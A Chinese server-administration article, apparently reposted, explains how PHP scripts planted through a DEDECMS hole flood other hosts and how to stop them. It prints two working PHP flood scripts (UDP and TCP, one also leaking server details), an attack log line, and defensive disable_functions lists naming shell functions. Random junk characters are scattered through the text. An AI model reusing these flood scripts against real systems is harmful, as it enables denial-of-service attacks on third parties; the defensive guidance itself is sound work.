服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好 _' T: o9 W1 }. Z
一。php对外发包分析) w, v4 `8 `$ q
用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
6 ? ~" Y. E5 J) U 以下是代码片段:
( e- y7 o! m% @5 j2 P $packets = 0;" [) ?! H- ]/ b( K
$ip = $_GET[\'ip\'];
, s. R. ]6 W1 W) H5 s. o" B. Y M9 } $rand = $_GET[\'port\'];
8 O5 g& M' T3 f3 i: j! S3 h$ Z set_time_limit(0);0 c3 U" e& h8 E( x. t) D6 S4 i
ignore_user_abort(FALSE);
2 O( ^ D! E2 Z, \ u3 W $exec_time = $_GET[\'time\'];sbxl-201206128 K, @$ o3 @# R& s5 r/ v
$time = time();
: r, ^& I. f0 k$ `1 U1 e print \'Flooded: $ip on port $rand
7 a6 z" i' O; [: Z! l" B \';
& s( m, Z9 D, I/ {! J7 S" h7 j $max_time = $time+$exec_time;: \2 U6 S, e$ {" Z+ l% Z- f
for($i=0;$i<65535;$i++){
1 U K% Q* r1 b' |9 x $out .= \'X\';" l! w/ d- i" e& ?, i, G. _
}
+ q9 T; b* j. R$ l3 ? while(1){
# d; Z4 |1 R( O- V4 [ $packets++;
/ X9 _" P0 c* A# J% b' k if(time() > $max_time){, y1 m5 |+ b8 J( v$ J
break;
# Q7 G( ]# D/ F& |) ^ }. I1 F( X; y$ y% w, F w
$fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);1 d) G" l! L: v+ t, U
if($fp){
8 f: ]" a: g7 H3 C# b fwrite($fp, $out);4 ?5 g. K; J% t6 f6 }
fclose($fp);' r6 q* Q7 |; D6 J7 [
}
2 t! p5 Z$ C7 v- t0 v% ? }
- h8 n9 }1 Y! u4 X echo \'Packet complete at \'.time(\'h:i:s\').\' with
, K$ @. p( b% N" U u $packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'., c) V% T% F- U8 K' ~
round($packets/$exec_time, 2) . \' packets/s ;
' y4 _2 j" f: `# o! N$ n' Z ?>3 P) g3 ^1 @, |0 v
二。表现特征
2 S) R: Q `4 Z' r1 n4 I4 x 一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
4 a) Z1 A# |/ B6 x' [ 近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
5 _, n. F, N- x$ Y3 p 如何快速找到这些站?
K3 C6 H6 A2 X9 M5 R5 s# e1 O 你可以打开日志" o+ P* M0 e m1 s; J; m
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,9 d5 t3 @# R0 q
里面有类似这样的记录:
$ e; ]. F7 o% v) S 2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_17 J7 P) u5 \$ B& x! {; S& }. \/ {
最后三项783 Disabled 30_FreeHost_1* _: f5 V+ ?! [# y
783就是这个站在IIS中的ID
$ ?, E$ D0 ?* {& F Z# o0 M( _1 G+ L 30_FreeHost_1就是所在池
5 e: z( Z! h% M. n( v3 r" W* C7 r8 p 三?解决办法, k' `) ]8 k1 V" O0 \' Q* e
1.按上述找到这个网站后停止它.或停止池,并重启IIS. P. r: }9 B* g- ]4 d
2.在IP策略,或防火墙中,禁止所有udp向外发送
/ T& W# A" I) Z/ n d' x 在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.
; U7 B4 h) V9 y r 为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了)/ B2 c2 V0 y( w2 W6 v
在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)7 X$ n( I! [6 Y# w [
3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)0 }- |; V) M3 F! H( R
4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
: @/ J. H' c6 f; L% R ignore_user_abort = On; X2 `8 R7 V0 w- |* ]
(注意前面的;号要删除)
6 Z% q! s; b3 C/ _- O( N) ` disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
1 ^( \8 [8 ]: c c 在后面加上+ ?, v0 e9 m/ y! C
fsockopen,set_time_limit
* v" u3 \, a* }( l0 j5 j( F" S+ `# j 但这样会造成很多php程序都不正常.
5 P% y6 p& @& i, L! i& N' C# C! c 另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?
; K) H* e7 a5 K' h- \$ _ 近期已有新的基于TCP攻击的PHPDDOS代码如下:9 v( r# C6 t X3 d3 I- `
以下是代码片段:$ p6 F# ]$ p9 u" n* N, e
set_time_limit(999999);$ u" v+ x0 N6 \8 N" a9 }! c
$host = $_GET['host'];& U, D! c( y5 n& X+ l3 m+ C R
$port = $_GET['port'];
9 E# l+ ] M7 F- u2 e! c- E+ R $exec_time = $_GET['time'];% n9 H5 R$ ]# K( l8 W
$packets = 64;
' K8 m$ K" b3 l) `( Q ignore_user_abort(True);; k, ^1 l3 c) I
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){2 ~. ]7 Y9 b c, I4 z+ k; q
if (StrLen($_GET['rat'])<>0){$ K6 d% }8 L0 f$ B
echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.
- q, P3 O; q$ `+ Z2 Y4 ? php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
, B! B/ W8 F& I0 w3 D! u exit;4 l/ n: I( }, |- z; O
}
7 @& x5 o a' n0 w. z$ `5 s c exit;; E, u: d3 r' x
}
3 g" B9 H; X5 h $max_time = time()+$exec_time;% y9 o' u n8 A$ H9 n
while(1){ B' X/ i4 }% T( `1 {; ]
$packets++;) H9 w. b" `% M1 X) {: b4 r5 M
if(time() > $max_time or $exec_time != 69){) v: x* w* a& f
break;
9 K$ A1 D9 F6 O }$ o1 q2 U% X9 v. l& \
$fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);
: i. u. }4 ]- t/ w. P9 C: n: ~ }
) x; D! ]$ J7 ]2 t( W ?>
' ]" h# a) r" q 同样,可以采有以下解决办法:/ \6 k. t9 g, \0 I
1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
% a! m! z0 ^9 N3 }7 q ignore_user_abort = On' k; _) w* ?, \+ Q k4 s. N, c e
(注意前面的;号要删除)
) H4 o8 B$ u. a, H' K disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
0 |6 `5 r/ X2 n# h3 z 在后面加上' m4 A" g" z# z) D
fsockopen,set_time_limit- e, T0 c/ c5 R6 @/ z
但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法& t7 [( ?% Q. V' i( K" R
2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?1 Z7 G: I$ J. t. _# ^9 w- C
3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?
& \( R7 K( l! v6 D) m4 e, E$ u. Y 文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。6 J, H8 d; Q$ R2 v+ o
|
